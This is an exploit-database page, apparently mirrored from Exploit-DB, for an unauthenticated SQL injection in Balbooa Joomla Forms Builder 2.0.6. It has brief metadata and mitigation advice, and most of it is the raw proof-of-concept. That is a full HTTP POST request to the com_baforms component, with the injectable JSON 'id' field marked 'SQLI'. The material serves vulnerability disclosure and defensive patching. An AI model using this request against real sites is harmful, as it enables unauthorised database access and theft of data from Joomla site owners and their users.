Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)

vendor:

Joomla Forms Builder

by:

blockomat2100

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Forms Builder

Affected Version From: 2.0.6

Affected Version To: 2.0.6

Patch Exists: YES

Related CWE:

CPE: 2.0.6

Metasploit:

Other Scripts:

Platforms Tested: Docker

2021

Balbooa Joomla Forms Builder 2.0.6 – SQL Injection (Unauthenticated)

An unauthenticated attacker can exploit a SQL injection vulnerability in Balbooa Joomla Forms Builder 2.0.6 by sending a specially crafted request. The request contains a malicious payload in the form of a JSON object, which is then used to execute arbitrary SQL commands on the vulnerable system.

Mitigation:

Input validation should be used to prevent malicious payloads from being sent to the vulnerable system. Additionally, the application should be updated to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker

An example request to trigger the SQL-Injection:

POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close

------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"

{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"

1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"

form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"

2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"

Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"

http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"

0
------WebKitFormBoundaryTAak6w3vHUykgInT--